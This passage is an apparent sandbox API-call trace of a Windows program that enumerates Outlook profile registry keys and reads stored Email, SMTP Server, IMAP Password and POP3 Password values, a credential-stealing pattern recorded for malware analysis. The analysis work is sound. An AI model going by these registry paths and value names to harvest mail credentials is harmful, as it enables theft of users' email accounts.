Subsystem\\Profiles\\Outlook\\05cb6f136411cf4daf1f74e966b0a7dc", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.382] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.382] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.382] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.382] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.382] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.382] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.382] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.382] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.382] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x1, lpName=0x91283f0, cchName=0x400 | out: lpName="0a0d020000000000c000000000000046") returned 0x0 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.383] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\0a0d020000000000c000000000000046", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.383] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.383] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.383] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.383] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.384] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x2, lpName=0x91283f0, cchName=0x400 | out: lpName="13dbb0c8aa05101a9bb000aa002fc45a") returned 0x0 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.384] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.384] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.384] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.384] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.384] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x3, lpName=0x91283f0, cchName=0x400 | out: lpName="3517490d76624c419a828607e2a54604") returned 0x0 [0135.384] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.385] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.385] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.385] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.385] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.385] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x4, lpName=0x91283f0, cchName=0x400 | out: lpName="4b62e5f8c092a64ea9b79fd559a5a15e") returned 0x0 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.385] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.385] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\4b62e5f8c092a64ea9b79fd559a5a15e", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.386] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.386] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.386] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x5, lpName=0x91283f0, cchName=0x400 | out: lpName="609a848a708f544697003a34105400ef") returned 0x0 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.386] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.386] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\609a848a708f544697003a34105400ef", phkResult=0x36f3bc | out: phkResult=0x36f3bc*=0x5ac) returned 0x0 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.386] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.387] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x400) returned 0x91287f8 [0135.387] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.387] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.387] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.387] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.387] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.387] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.387] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x6, lpName=0x91283f0, cchName=0x400 | out: lpName="63cba20b08018a458b6edb5d87fb54da") returned 0x0 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.387] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.388] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.388] RegCloseKey (hKey=0x5ac) returned 0x0 [0135.388] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x7, lpName=0x91283f0, cchName=0x400 | out: lpName="828cd3a417cead4ab3a214070dce1c3d") returned 0x0 [0135.388] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.388] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.388] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.388] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.388] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.388] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x8, lpName=0x91283f0, cchName=0x400 | out: lpName="8503020000000000c000000000000046") returned 0x0 [0135.388] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.388] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.388] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.389] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.389] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0x9, lpName=0x91283f0, cchName=0x400 | out: lpName="88d17fec23cbdd4fb54ad1d34c0dce09") returned 0x0 [0135.389] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.389] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.389] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.389] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.389] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0xa, lpName=0x91283f0, cchName=0x400 | out: lpName="9207f3e0a3b11019908b08002b2a56c2") returned 0x0 [0135.389] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.389] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.389] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.389] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91287f8, cchName=0x400 | out: lpName="\x88\x1c\x18\x09x") returned 0x103 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x91287f8 | out: hHeap=0x3f0000) returned 1 [0135.389] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x449648 | out: hHeap=0x3f0000) returned 1 [0135.390] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd6e8 | out: hHeap=0x3f0000) returned 1 [0135.390] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0135.390] RegEnumKeyA (in: hKey=0x5a8, dwIndex=0xb, lpName=0x91283f0, cchName=0x400 | out: lpName="9375CFF0413111d3B88A00104B2A6676") returned 0x0 [0135.390] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0135.390] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd6e8 [0135.390] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x80) returned 0x449648 [0135.390] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x0, lpName=0x91372c0, cchName=0x100 | out: lpName="00000001") returned 0x0 [0135.390] RegOpenKeyA (in: hKey=0x5ac, lpSubKey="00000001", phkResult=0x36f3b8 | out: phkResult=0x36f3b8*=0x5b0) returned 0x0 [0135.390] RegQueryValueExA (in: hKey=0x5b0, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0xf8, lpcbData=0x36f264*=0x200) returned 0x2 [0135.390] RegQueryValueExA (in: hKey=0x5b0, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0xf8, lpcbData=0x36f264*=0x200) returned 0x2 [0135.390] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.390] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x1, lpName=0x91372c0, cchName=0x100 | out: lpName="00000002") returned 0x0 [0135.390] RegOpenKeyA (in: hKey=0x5ac, lpSubKey="00000002", phkResult=0x36f3b8 | out: phkResult=0x36f3b8*=0x5b0) returned 0x0 [0135.390] RegQueryValueExA (in: hKey=0x5b0, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0xf8, lpcbData=0x36f264*=0x200) returned 0x2 [0135.390] RegQueryValueExA (in: hKey=0x5b0, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0xf8, lpcbData=0x36f264*=0x200) returned 0x2 [0135.390] RegCloseKey (hKey=0x5b0) returned 0x0 [0135.391] RegEnumKeyA (in: hKey=0x5ac, dwIndex=0x2, lpName=0x91372c0, cchName=0x100 | out: lpName="00000003") returned 0x0 [0135.391] RegOpenKeyA (in: hKey=0x5ac, lpSubKey="00000003", phkResult=0x36f3b8 | out: phkResult=0x36f3b8*=0x5b0) returned 0x0 [0135.391] RegQueryValueExA (in: hKey=0x5b0, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0x76, lpcbData=0x36f264*=0x26) returned 0x0 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1) returned 0x90d56c0 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2) returned 0x90d5700 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3) returned 0x90d56c0 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4) returned 0x90d5700 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6) returned 0x90d56c0 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126300 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd) returned 0x9126318 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126300 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x13) returned 0x4151f0 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126318 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1c) returned 0x41e2e0 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4151f0 | out: hHeap=0x3f0000) returned 1 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2a) returned 0x9174de8 [0135.391] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0135.391] RegQueryValueExA (in: hKey=0x5b0, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0x67, lpcbData=0x36f264*=0xc) returned 0x0 [0135.391] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1) returned 0x90d56c0 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2) returned 0x90d5700 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x3) returned 0x90d56c0 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4) returned 0x90d5700 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6) returned 0x90d56c0 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d5700 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x9126318 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xd) returned 0x9126300 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9126318 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0135.396] RegQueryValueExA (in: hKey=0x5b0, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0x67, lpcbData=0x36f264*=0x200) returned 0x2 [0135.396] RegQueryValueExA (in: hKey=0x5b0, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x36f050, lpcbData=0x36f264*=0x200 | out: lpType=0x0, lpData=0x36f050*=0x2, lpcbData=0x36f264*=0x131) returned 0x0 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1) returned 0x90d56c0 [0135.396] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x2) returned 0x90d5700 [0135.396] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x90d56c0 | out: hHeap=0x3f0000) returned 1 [0135.396] RtlAllocateHeap 